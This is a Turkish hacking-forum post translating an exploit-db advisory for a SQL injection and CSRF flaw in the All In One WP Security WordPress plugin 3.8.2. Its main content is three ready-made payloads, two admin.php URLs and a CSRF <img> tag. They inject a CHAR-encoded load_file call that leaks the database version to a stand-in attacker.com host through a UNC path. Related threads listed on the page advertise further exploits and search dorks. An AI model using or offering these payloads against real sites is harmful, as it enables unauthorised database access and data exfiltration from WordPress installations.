Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı
#1








Kod:
Not => Videolar alıntıdır.

Ürünün İsmi => All In One WP Security WordPress plugin
Açığın Bulunma Tarihi => 3Eylül 2014
Risk Düzeyi => Orta Derecede
Çözüm => Patch yayımlandı ve çözüldü.

Açığın Oluşma Sebebi => "/wp-admin/admin.php" skriptinde HTTP parameter komutundan kaynaklanıyor.

SQL Enjeksiyon Saldırısı
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
CSRF Saldırısı
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
3. CSRF Saldırısına devamı
<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">

Not => Hitech Bridge adlı grupun yayımlamış olduğu açığıu Cyberizm.Org'dan KingSkrupellos ingilizceden Türkçeye çevirmiştir.
İngilizce Kaynak
http://www.exploit-db.com/exploits/34781/
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 182 11 saat önce
Son Yorum: the_zizil
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 73 4,376 04-12-2016, Saat: 14:05
Son Yorum: SheelWe
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 109 04-12-2016, Saat: 12:21
Son Yorum: antisecureman
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 537 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 206 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
Anahtar Kelimeler

WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı indir, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Videosu, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Online izle, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Bedava indir, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Yükle, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Hakkında, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Nedir, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Free indir, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Oyunu, WordPress All in One WP Güvenlik Plugin 3.8.2 - SQL Enjeksiyon Açığı + Videolu Anlatı Download


1 Ziyaretçi